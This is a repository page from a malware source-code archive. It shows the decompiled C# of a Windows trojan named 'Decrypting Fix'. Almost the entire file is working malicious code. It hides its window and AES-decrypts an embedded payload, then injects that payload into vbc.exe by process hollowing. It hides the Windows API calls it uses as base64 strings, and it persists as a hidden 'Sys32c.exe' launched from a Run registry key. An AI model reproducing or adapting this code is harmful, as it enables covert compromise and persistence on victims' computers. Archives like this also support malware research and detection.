ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-20 00:58:52 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/I/Trojan.Win32.Inject.bvqp-82e6872a62164069321f9add60821c490a425ee1ff065a7296986c3fb2473a9f/Program/Main.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

285 lines
12 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Program.Main
// Assembly: Decrypting Fix, Version=6.1.7600.16385, Culture=neutral, PublicKeyToken=null
// MVID: 5EC331FA-B6C2-444A-898D-1B8B7F0DD4AE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.bvqp-82e6872a62164069321f9add60821c490a425ee1ff065a7296986c3fb2473a9f.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32.SafeHandles;
using My;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
namespace Program
{
public class Main : Form
{
private IContainer Components;
private const string q4VJ3UxL2Hj9tVz2wT = "kernel32";
[STAThread]
public static void Main() => Application.Run((Form) new Program.Main());
public Main()
{
this.Load += new EventHandler(this.Main_Load);
Application.EnableVisualStyles();
this.InitializeComponent();
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(1, 1);
this.Opacity = 0.0;
this.ShowInTaskbar = false;
this.Name = nameof (Main);
this.Text = nameof (Main);
this.ResumeLayout(false);
this.PerformLayout();
}
protected override void Dispose(bool Disposing)
{
if (Disposing && this.Components != null)
this.Components.Dispose();
base.Dispose(Disposing);
}
[DebuggerStepThrough]
private void InitializeComponent()
{
}
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true, BestFitMapping = false)]
public static extern Program.Main.qRTN9lUpullIj6GUh LoadLibrary(string qRTN9lUpullIj6GUh);
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(
Program.Main.qRTN9lUpullIj6GUh qhEbZGm2H8ZnH42HR,
string qCLRHRrHOXv2JxQNyFE);
public T q2wRmsfiDJ8WoDorwrT<T>(string qRgQq5TmqXow75lyuU, string qTt3E6FjNzOQO1IVq54z) => (T) Marshal.GetDelegateForFunctionPointer(Program.Main.GetProcAddress(Program.Main.LoadLibrary(qRgQq5TmqXow75lyuU), qTt3E6FjNzOQO1IVq54z), typeof (T));
public bool qod7iE7xbZivMdsc27FyN(byte[] qutBjatOQGsHGrnZrJMh, string qOgUFl9aN9Ozcfheoo)
{
Program.Main.qK5eLdqzmCYTmerrjty k5eLdqzmCyTmerrjty = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qK5eLdqzmCYTmerrjty>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("Q3JlYXRlUHJvY2Vzc0E=")));
Program.Main.qpu7UEEIb1NNCzbBPjE qpu7UeeIb1NnCzbBpjE = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qpu7UEEIb1NNCzbBPjE>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("R2V0VGhyZWFkQ29udGV4dA==")));
Program.Main.qVK7EbJcVZNQviBk2nD vk7EbJcVznQviBk2nD = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qVK7EbJcVZNQviBk2nD>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVhZFByb2Nlc3NNZW1vcnk=")));
Program.Main.qyuBnubPQitzQwFVMpH1 bnubPqitzQwFvMpH1 = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qyuBnubPQitzQwFVMpH1>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("VmlydHVhbEFsbG9jRXg=")));
Program.Main.q1FykcnusJynatl87SgQ fykcnusJynatl87SgQ = this.q2wRmsfiDJ8WoDorwrT<Program.Main.q1FykcnusJynatl87SgQ>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("V3JpdGVQcm9jZXNzTWVtb3J5")));
Program.Main.qyLl34wgTMSMCFLkuoX ll34wgTmsmcfLkuoX = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qyLl34wgTMSMCFLkuoX>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("U2V0VGhyZWFkQ29udGV4dA==")));
Program.Main.qjgLmnnKy8isUYejVoUfc lmnnKy8isUyejVoUfc = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qjgLmnnKy8isUYejVoUfc>(Encoding.UTF8.GetString(Convert.FromBase64String("a2VybmVsMzI=")), Encoding.UTF8.GetString(Convert.FromBase64String("UmVzdW1lVGhyZWFk")));
Program.Main.qGrlH13erjwuO8Ium8y1t h13erjwuO8Ium8y1t = this.q2wRmsfiDJ8WoDorwrT<Program.Main.qGrlH13erjwuO8Ium8y1t>(Encoding.UTF8.GetString(Convert.FromBase64String("bnRkbGw=")), Encoding.UTF8.GetString(Convert.FromBase64String("WndVbm1hcFZpZXdPZlNlY3Rpb24=")));
bool flag;
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] qIadr6hocYeSQqHaF = new IntPtr[4];
byte[] qmnfIw7BIwOHrrKSmLdoW = new byte[68];
int int32_1 = BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, 60);
int int16 = (int) BitConverter.ToInt16(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 6));
IntPtr qt3C7UZF1LBmvmLls5cK = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 84)));
if (k5eLdqzmCyTmerrjty((string) null, new StringBuilder(qOgUFl9aN9Ozcfheoo), zero1, zero1, false, 4, zero1, (string) null, qmnfIw7BIwOHrrKSmLdoW, qIadr6hocYeSQqHaF))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (qpu7UeeIb1NnCzbBpjE(qIadr6hocYeSQqHaF[1], numArray1))
{
IntPtr qkD4wxFJEaTcgyH8vkU = new IntPtr(checked ((long) numArray1[41] + 8L));
IntPtr zero2 = IntPtr.Zero;
IntPtr qP117M8hA2NaWe7f77D = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (vk7EbJcVznQviBk2nD(qIadr6hocYeSQqHaF[0], qkD4wxFJEaTcgyH8vkU, ref zero2, (int) qP117M8hA2NaWe7f77D, ref zero3) && h13erjwuO8Ium8y1t(qIadr6hocYeSQqHaF[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 52)));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, checked (int32_1 + 80)));
IntPtr qjPIGVcpPXDEKLJbthX = bnubPqitzQwFvMpH1(qIadr6hocYeSQqHaF[0], num1, num2, 12288, 64);
int int32_2 = qjPIGVcpPXDEKLJbthX.ToInt32();
int qILqBydH6XFqpsca2ULHe;
int num3 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], qjPIGVcpPXDEKLJbthX, qutBjatOQGsHGrnZrJMh, checked ((uint) (int) qt3C7UZF1LBmvmLls5cK), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
int num4 = checked (int16 - 1);
int num5 = 0;
while (num5 <= num4)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) qutBjatOQGsHGrnZrJMh, checked (int32_1 + 248 + num5 * 40), (Array) dst, 0, 40);
byte[] numArray2 = new byte[checked (dst[4] - 1 + 1)];
Buffer.BlockCopy((Array) qutBjatOQGsHGrnZrJMh, dst[5], (Array) numArray2, 0, numArray2.Length);
num2 = new IntPtr(checked (int32_2 + dst[3]));
num1 = new IntPtr(numArray2.Length);
int num6 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], num2, numArray2, checked ((uint) (int) num1), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
checked { ++num5; }
}
num2 = new IntPtr(checked ((long) numArray1[41] + 8L));
num1 = new IntPtr(4);
int num7 = fykcnusJynatl87SgQ(qIadr6hocYeSQqHaF[0], num2, BitConverter.GetBytes(qjPIGVcpPXDEKLJbthX.ToInt32()), checked ((uint) (int) num1), qILqBydH6XFqpsca2ULHe) ? 1 : 0;
numArray1[44] = checked ((uint) (qjPIGVcpPXDEKLJbthX.ToInt32() + BitConverter.ToInt32(qutBjatOQGsHGrnZrJMh, int32_1 + 40)));
int num8 = ll34wgTmsmcfLkuoX(qIadr6hocYeSQqHaF[1], numArray1) ? 1 : 0;
}
}
int num = (int) lmnnKy8isUyejVoUfc(qIadr6hocYeSQqHaF[1]);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
flag = false;
ProjectData.ClearProjectError();
goto label_11;
}
flag = true;
label_11:
return flag;
}
private void Main_Load(object sender, EventArgs e)
{
RuntimeHelpers.GetObjectValue(My.Resources.Resources.ResourceManager.GetObject("qPEldicfv5EC3Gb8WccKM"));
this.qod7iE7xbZivMdsc27FyN(this.qcY2cSqjQOEnNyB8BR(My.Resources.Resources.qPEldicfv5EC3Gb8WccKM), Encoding.UTF8.GetString(Convert.FromBase64String("QzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29ya1x2Mi4wLjUwNzI3XHZiYy5leGU=")));
try
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData) + "\\Sys32c.exe";
if (!MyProject.Computer.FileSystem.FileExists(str))
{
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, str);
MyProject.Computer.Registry.SetValue(Encoding.UTF8.GetString(Convert.FromBase64String("SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu")), "DefaultSystem", (object) str);
FileInfo fileInfo = MyProject.Computer.FileSystem.GetFileInfo(str);
fileInfo.IsReadOnly = true;
fileInfo.Attributes |= FileAttributes.Hidden;
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
this.Close();
}
public byte[] qcY2cSqjQOEnNyB8BR(byte[] qVwWsMfhGAWEi5KvwpG)
{
using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
{
rijndaelManaged.IV = new byte[16]
{
(byte) 171,
(byte) 242,
(byte) 129,
(byte) 120,
(byte) 87,
(byte) 84,
(byte) 55,
(byte) 143,
(byte) 127,
(byte) 97,
(byte) 129,
(byte) 71,
(byte) 232,
(byte) 183,
(byte) 126,
(byte) 29
};
rijndaelManaged.Key = new byte[16]
{
(byte) 29,
(byte) 126,
(byte) 183,
(byte) 232,
(byte) 71,
(byte) 129,
(byte) 97,
(byte) 127,
(byte) 143,
(byte) 55,
(byte) 84,
(byte) 87,
(byte) 120,
(byte) 129,
(byte) 242,
(byte) 171
};
return rijndaelManaged.CreateDecryptor().TransformFinalBlock(qVwWsMfhGAWEi5KvwpG, 0, qVwWsMfhGAWEi5KvwpG.Length);
}
}
public sealed class qRTN9lUpullIj6GUh : SafeHandleZeroOrMinusOneIsInvalid
{
private qRTN9lUpullIj6GUh()
: base(true)
{
}
protected override bool ReleaseHandle() => Program.Main.qSuwkqfclcYh5UpnG.FreeLibrary(this.handle);
}
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool qK5eLdqzmCYTmerrjty(
string qRgQq5TmqXow75lyuU,
StringBuilder qbcEbU7rMvcsrxe3UfH,
IntPtr qTt3E6FjNzOQO1IVq54z,
IntPtr qR7zirBJB9tbtFlemR3Z,
[MarshalAs(UnmanagedType.Bool)] bool qhi7j6CyTUe8Si7lI9Xn,
int q6ENwac4IZbZencEv,
IntPtr qBskTdk7zX6JqTmKRbVVl,
string quP1X9oZ6fCT6IaPiDYa1,
byte[] qmnfIw7BIwOHrrKSmLdoW,
IntPtr[] qIadr6hocYeSQqHaF);
public delegate bool q1FykcnusJynatl87SgQ(
IntPtr qYHiiijjxQIiXT9rTD,
IntPtr qjPIGVcpPXDEKLJbthX,
byte[] qJfIPq6CUMbtHKrLIs,
uint qt3C7UZF1LBmvmLls5cK,
int qILqBydH6XFqpsca2ULHe);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool qVK7EbJcVZNQviBk2nD(
IntPtr qS5ZIQwRANdTpNyTLP,
IntPtr qkD4wxFJEaTcgyH8vkU,
ref IntPtr qDRGjGAgqVI9O6nt8qQ,
int qP117M8hA2NaWe7f77D,
ref IntPtr qgQuF44s6nNhK76J6F);
public delegate IntPtr qyuBnubPQitzQwFVMpH1(
IntPtr qgKtQSSPpjGZPbYLXHg,
IntPtr qJpnTY3YBIic8GBgswb,
IntPtr qsAYUzRMLvVLHofKIQNfy,
int q1Bew5H1CpIKvMeM6Dl,
int q3avwBWdX7hBcVtlx);
public delegate uint qGrlH13erjwuO8Ium8y1t(
IntPtr q8baWCaFMTPwgN6SK4,
IntPtr qws4HXjQQZ6vytG9ZhF);
public delegate uint qjgLmnnKy8isUYejVoUfc(IntPtr qZBkmqcsDu7ALWuxFsaR);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool qpu7UEEIb1NNCzbBPjE(
IntPtr q8aJbsdB3RE7K3IemC,
uint[] qgwTtKHdkZrSrwWXUf7YC);
[return: MarshalAs(UnmanagedType.Bool)]
public delegate bool qyLl34wgTMSMCFLkuoX(
IntPtr q7eGeMCDidTxqOaWBt,
uint[] qmYWjBfxHvovyYUEQNEph);
public sealed class qSuwkqfclcYh5UpnG
{
private const string qyZwDbaHtRhHvobT4Jwdt = "kernel32";
[ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
[DllImport("kernel32", SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool FreeLibrary(IntPtr qqI56ettNvDsxSFeCqpVt);
}
}
}
Reference in New Issue View Git Blame Copy Permalink